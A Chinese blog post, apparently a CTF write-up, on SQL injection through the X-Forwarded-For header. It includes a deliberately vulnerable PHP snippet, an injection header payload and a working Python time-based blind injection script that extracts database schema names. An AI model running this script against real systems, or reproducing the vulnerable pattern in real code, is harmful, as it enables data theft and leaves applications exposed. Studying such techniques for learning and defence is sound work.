机缘巧合接触了一点关于sql注入的网络安全问题

依托 headers 的 sql 注入

一般来说大家都很清楚用户输入的危险性，通常会对用户表单提交的数据进行过滤（引号转码）。

但是如果写过网络爬虫，那么就很清楚其实http的headers 也是由用户自己构造的，因此对一些从headers获取的变量就不能掉以轻心。比如<strongstyle="color:#890729;">userAgent, ip等。

这里有一个sql注入的题目：who are you? -- http://www.shiyanbar.com/ctf/1941

代码漏洞示例

    if (!empty($_SERVER["HTTP_CLIENT_IP"])) {

        $cip = $_SERVER["HTTP_CLIENT_IP"];

    } else if (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) {

        $cip = $_SERVER["HTTP_X_FORWARDED_FOR"];

    } else if (!empty($_SERVER["REMOTE_ADDR"])) {

        $cip = $_SERVER["REMOTE_ADDR"];

    } else {

        $cip = 'unknow';

    }

    // 未对ip 进行安全转码

    echo 'Your IP address is : '.$cip;

    // 直接拼接sql，未使用pdo参数绑定

    $sql = "INSERT INTO IP (ip) VALUES ('$cip') ";

    $DB->query($sql);

构造sql注入的headers

接触过爬虫/CURL都很熟悉了，构造headers参数就行，以python为例：

headers = {

        "X-forwarded-for": "'+(select 1) and '1'='1"

}

req=requests.get(url,headers=headers)

如果顺利的话，应该会类似输出 Your IP address is : '+(select 1) and '1'='1

time-based 时间盲注

看到这里，你可能跟我一样有个疑问。怎么才能破解数据库的信息呢？虽然可以Drop database *;...

我们只能构造sql，并让服务器运行，却不能让页面输出sql的查询结果

这时候时间盲注就排上用场了 Sql注入系列详解(一)---基于时间差的盲注

它的原理很容易理解：

• sql执行速度，在查询条件不存在时响应很快（跟查询语句有关）
• sleep() 语句可以人为控制sql响应时间
• 虽然不能控制页面的输出，但是可以通过sleep()来控制页面响应时间。根据页面响应时间来判断是否命中查询信息

所以核心思想是，通过sql语句控制页面的响应时间

破解过程非常暴力，看代码一目了然：

def crack_records(url, sql, max_row, max_length):

    #guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation

    # mysql 不区分大小写

    guess = string.ascii_lowercase+string.digits+string.punctuation

    res = []

    for n in range(0,max_row):        #假设爆破前 max_row 个记录

        result=''

        for i in range(1,max_length):                  #爆破字符串长度，假设不超过 max_length 长度

            flag=0

            for str in guess:                   #爆破该位置的字符

                headers = {"X-forwarded-for":"'+"+" (select case when (substring((%s limit 1 offset %d) FROM %d FOR 1)='%s') then sleep(8) else 1 end) and '1'='1" % (sql,n,i,str)}

                try:

                    req=requests.get(url,headers=headers,timeout=6)

                except:

                    result+=str

                    flag=1

                    print('正在扫描第%d个记录，the result now is '%(n+1) ,result)

                    break

            if flag==0:

                break

        res.append(result)

        #

        if i==1 and flag==0:

            print('扫描完成')

            break

    return res

# 除information_schema外的database

sql = "select schema_name from information_schema.SCHEMATA WHERE schema_name<>'information_schema' "

res = crack_records(url, sql, 100, 500)

print (res)

文章参考

实验吧CTF-Who are you？

总结

1. 破解过程非常耗时，根据网页的响应时长调整timeout阈值
2. 当网页因为其他原因超时相应时会产生误差，因此网络不好的情况下需要重复破解以精确结果。
3. 这些人好特么聪明啊啊啊啊啊！！！